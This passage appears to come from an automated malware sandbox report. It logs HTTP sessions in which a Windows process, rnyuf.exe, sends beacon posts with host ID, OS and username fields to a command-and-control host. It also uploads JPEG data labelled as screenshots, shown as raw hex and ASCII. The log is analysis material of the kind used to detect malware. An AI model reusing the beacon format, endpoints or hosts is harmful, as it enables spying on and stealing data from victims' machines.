                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:19.042891979 CET2419OUTData Raw: 2d 2d 2d 2d 2d 2d 66 65 35 66 64 39 64 39 37 32 61 66 61 39 34 36 33 39 30 36 61 62 32 36 35 62 35 63 36 30 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------fe5fd9d972afa9463906ab265b5c60cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:19.043067932 CET2429OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:19.043206930 CET2431OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:19.065486908 CET2439OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:19.065557003 CET2444OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:19.065579891 CET2450OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:19.065598011 CET2454OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:19.065612078 CET2456OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:19.065634012 CET2459OUTData Raw: 14 5d 92 ea 79 15 04 72 9e 88 4f e1 52 2d bc c7 f8 71 f5 a9 cc cf db 02 9a 64 7f ef 1a 35 27 9d b0 16 ad dd d4 7e 34 f1 6e 83 ac 9f 95 47 b8 fa d2 03 4e cc 97 76 58 d9 02 9f bc 4d 3b 7c 2b d1 41 aa d9 a2 8e 42 6c 5a 17 40 7d d4 5f ca 83 7b 2f f7
                          Data Ascii: ]yrOR-qd5'~4nGNvXM;|+ABlZ@}_{/UsFi{8n>.>>f${s+dcLXGEdK{x|5oo\AZ}~&qOJ<3R(xYt;AxXrnXd}5k<Ej8^hWT
                          Nov 12, 2021 22:23:19.088042021 CET2462OUTData Raw: e1 4e 06 98 29 d5 48 96 89 41 e2 9f 9a 88 1a 70 35 69 90 d1 20 34 f0 6a 20 79 a7 29 ab 4c 86 89 37 53 5e 64 89 37 c8 e1 57 38 e4 13 cf e1 f4 a4 26 a9 6a 27 fd 17 fe da 0f e4 6b 2c 45 57 4e 9b 94 4d 30 f4 95 4a 8a 2c b0 6f ed ff 00 e7 ba ff 00 df
                          Data Ascii: N)HAp5i 4j y)L7S^d7W8&j'k,EWNM0J,o-o|V%JG$yP:{roEs`jw_([>gAo=oN{\-?*DfQ:!n?k^\yt<kv?
                          Nov 12, 2021 22:23:19.137845039 CET2541INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:19 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          190192.168.2.449976178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.653738022 CET8595OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----3529b1c2a4757137df590a1ac8a0c6db
                          Host: depressionk1d.ug
                          Content-Length: 107582
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:57.653925896 CET8595OUTData Raw: 2d 2d 2d 2d 2d 2d 33 35 32 39 62 31 63 32 61 34 37 35 37 31 33 37 64 66 35 39 30 61 31 61 63 38 61 30 63 36 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------3529b1c2a4757137df590a1ac8a0c6dbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:57.654236078 CET8605OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:57.654447079 CET8607OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:57.676971912 CET8616OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:57.677040100 CET8624OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:57.677057028 CET8628OUTData Raw: cc c9 04 be 74 2b 23 2c 72 ed 2b bd 41 e1 b0 79 19 1c e2 9b 85 a6 3c b2 4d 23 cb 2c 8d 24 ae c5 9d dc e5 98 9e 49 27 b9 a3 35 d9 1d 92 67 24 ac db 68 77 96 a7 bd 21 88 7a d2 73 4b 93 55 a1 3a 89 e4 fb d1 e4 9a 5d c6 97 79 a2 c8 77 90 cf 29 a9 0a
                          Data Ascii: t+#,r+Ay<M#,$I'5g$hw!zsKU:]yw)R0zQd+.==!G s(F4i<=jhKS}nXs"ZaHca1tJ.b()E%(Zb((QE-%aE.(wb, QKMLRKHES(vIJ(NP
                          Nov 12, 2021 22:23:57.677071095 CET8633OUTData Raw: 83 af 88 a9 14 ec ed fa a3 d1 cc eb aa 14 a1 26 ae af fa 33 d5 da 4b c4 f0 df 9d 68 d1 b5 e7 96 ae 0c a0 ed 2d c6 78 1f 8d 67 f8 96 e1 6e fc 05 ac dc a7 dd 96 cd a4 1f 43 18 35 61 27 b9 b8 f0 5c 33 5a 46 0d c4 f6 d1 79 6a 4f 0a 58 2f 27 d8 67 3f
                          Data Ascii: &3Kh-xgnC5a'\3ZFyjOX/'g?E{t}[`dWc(STX.5Si_5HN:P_ok~%I,\.,8\y;l$2$!o$
                          Nov 12, 2021 22:23:57.699536085 CET8637OUTData Raw: 72 e5 b4 1e 1e d4 2d fe dd 1a ea 56 56 96 d7 11 a5 e2 4d 71 1c ad e5 48 4a 89 11 84 6b f7 5b aa 95 39 07 82 2a ae ad a3 b6 87 6f 14 37 a5 bf b4 26 9e 40 a8 a4 6c 10 a1 2b bf d7 e6 60 71 ec a7 ae 45 3a e7 51 d0 df c3 97 5a 6d 8d 9e a3 61 3c b2 a3
                          Data Ascii: r-VVMqHJk[9*o7&@l+`qE:QZma<M*]y?-A;V$8R)5{n~-n\gqu%ME4+}KXFUur8RV5fY7B#e#k-@.#.$\$6_`kEYnm!o)pC`>k
                          Nov 12, 2021 22:23:57.699584007 CET8641OUTData Raw: 54 53 46 e8 4f 58 ff 00 2a a9 be 97 7d 4f b3 15 99 70 25 b3 0e e2 a4 5b 48 1b ee cd 8f ad 51 0f 4f 12 0a 97 07 d1 8d 3b 74 34 46 94 58 65 26 53 4e fe c7 9c 8f e1 3f 8d 50 4b 87 5e 8c 45 5a 8f 51 99 0f de ac a4 aa ad 99 ac 65 49 fc 48 93 fb 16 73
                          Data Ascii: TSFOX*}Op%[HQO;t4FXe&SN?PK^EZQeIHs?#L}~UQVNx04sh,I*GWuj@0%Ox-)|5=XIJ=+NnCzMidEe,PgD2Gp+P\[HAX6:
                          Nov 12, 2021 22:23:57.699616909 CET8655OUTData Raw: 7f c8 22 cf fe b8 27 fe 82 2a e2 ca 45 fd bc 60 f0 d0 39 3e c7 2b 8f eb f9 55 1d 30 ff 00 c4 a2 cf fe b8 27 fe 82 2a c5 bd b4 13 cb 70 c6 e0 3c f9 55 c2 37 cd 0e 06 40 eb c1 f9 b3 db 86 15 f2 18 36 dd 69 5b fa d4 fa 27 ca a3 79 0c bd 0f 1a 6a 69
                          Data Ascii: "'*E`9>+U0'*p<U7@6i['yjipA;k/O5'c1Sx+TQ4vx@oZ{~+A?6p?_- T('}/^^@}/\34>/rDD{?
                          Nov 12, 2021 22:23:57.747344971 CET8706INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:57.801731110 CET8707OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.827413082 CET8707INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          191192.168.2.449977178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:57.970316887 CET8721OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:57.995024920 CET8721INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          192192.168.2.449978178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:58.138899088 CET8734OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:58.164282084 CET8734INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:58.178031921 CET8734OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----7b616cd57d8ad98a4b4d99fe00a47553
                          Host: depressionk1d.ug
                          Content-Length: 106954
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:58.178155899 CET8734OUTData Raw: 2d 2d 2d 2d 2d 2d 37 62 36 31 36 63 64 35 37 64 38 61 64 39 38 61 34 62 34 64 39 39 66 65 30 30 61 34 37 35 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------7b616cd57d8ad98a4b4d99fe00a47553Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:58.186304092 CET8744OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:58.186649084 CET8747OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:58.209187984 CET8768OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:58.209286928 CET8774OUTData Raw: da 6d 23 48 98 49 79 20 d9 34 c8 72 22 1d c0 3f de fe 5f 5a f1 b1 45 02 bd cc 06 02 96 0a 97 b3 a7 f3 7d c3 11 88 9d 79 f3 48 0d 6d 69 9f f2 0a 9b fe bb af fe 82 d5 8d 5b 3a 67 fc 82 e6 ff 00 ae eb ff 00 a0 b5 76 b3 02 5a 28 a2 82 4f a1 7c 2b e2
                          Data Ascii: m#HIy 4r"?_ZE}yHmi[:gvZ(O|+-?]!$5Ian]gjNY3|WzewvS<3YO}GJ6mu-49NI]%c$}3-*@qY.rF\ZI[ZP0Gp3
                          Nov 12, 2021 22:23:58.232085943 CET8780OUTData Raw: db b1 8f 24 64 74 c9 04 0a 7a 7f 88 6e f4 f8 44 6d 61 61 77 e5 dd 35 e5 b3 5c 23 93 6d 33 63 2c 9b 58 03 f7 54 e1 c3 0f 94 71 d7 31 c1 e2 0d 4a 19 2c 24 2b 04 92 58 db 5c 5b 23 38 62 5d 66 f3 37 96 e7 96 fd eb 63 18 ed d6 93 75 ed b6 bf f0 3f cf
                          Data Ascii: $dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28 POe;[k6K'[l_r*T|wHm#b1,&m$0=2
                          Nov 12, 2021 22:23:58.232177973 CET8811OUTData Raw: 34 fc 7f e0 fe 67 1e 1f 36 9a 56 a9 ae bf 87 fc 0f c8 e9 7e 21 7f c9 16 d3 7f dc b4 ff 00 d0 2b c1 4d 7b cf c4 3f f9 22 da 6f fb 96 9f fa 05 78 2d 71 d0 fb 5e ac ee ab b4 7d 10 b4 52 52 d6 e6 21 da 8a 5e d4 86 81 05 02 8a 51 40 05 2f 6a 4a 5a 60
                          Data Ascii: 4g6V~!+M{?"ox-q^}RR!^Q@/jJZ`Q@QQKLL)i)EKIE0u0udSsN8QMMU"XKH)jS4R8e(c0S,- N($\fSQ*#iE4!h-1J}0qJMZ!p <j2i4j@
                          Nov 12, 2021 22:23:58.232300997 CET8827OUTData Raw: 3d 9c a4 ef 27 73 89 a2 8a 51 d6 be 74 fa 63 d3 fe 05 7f c8 ed 7b ff 00 60 d7 ff 00 d1 91 d7 bd 5e 1f f4 57 fc 3f 9d 7c db f0 b3 c4 96 1e 18 f1 63 5c ea 4c c9 6f 71 6c d6 fe 60 19 08 4b 23 02 7d be 5f d6 bd a3 c7 7e 2e 8f c3 7e 1b b5 d5 61 b7 5b
                          Data Ascii: ='sQtc{`^W?|c\Loql`K#}_~.~a[HdAZI-ie0AW//k?\\+*'(3REu%(>|?R^q+[;;KO0I9w
                          Nov 12, 2021 22:23:58.254834890 CET8841OUTData Raw: 67 ec a5 4a 6b b3 36 8d 55 56 2f ba 3c da 8a 28 ab 24 29 69 29 68 03 7b c0 ff 00 f2 3f f8 73 fe c2 76 df fa 35 6b eb cb bb 1d 52 6b a7 92 db 58 fb 3c 27 1b 62 fb 32 be de 3d 4f 5e 79 af 95 34 7b 38 6c cd 96 a1 02 94 ba 8f 64 c9 20 63 95 71 82 08
                          Data Ascii: gJk6UV/<($)i)h{?sv5kRkX<'b2=O^y4{8ld cqG:NX9Nc.!60;|h8Ho,%QJYAd~eDZ|2W'Z*Cn=K)W'o<GAjV0n%hwmrC
                          Nov 12, 2021 22:23:58.279544115 CET8842INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          193192.168.2.449980178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:58.312207937 CET8843OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:58.337903976 CET8843INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          194192.168.2.449981178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:58.493805885 CET8844OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:58.520597935 CET8844INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          195192.168.2.449982178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:58.679101944 CET8850OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:58.704658985 CET8850INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          196192.168.2.449983178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:58.839951038 CET8851OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
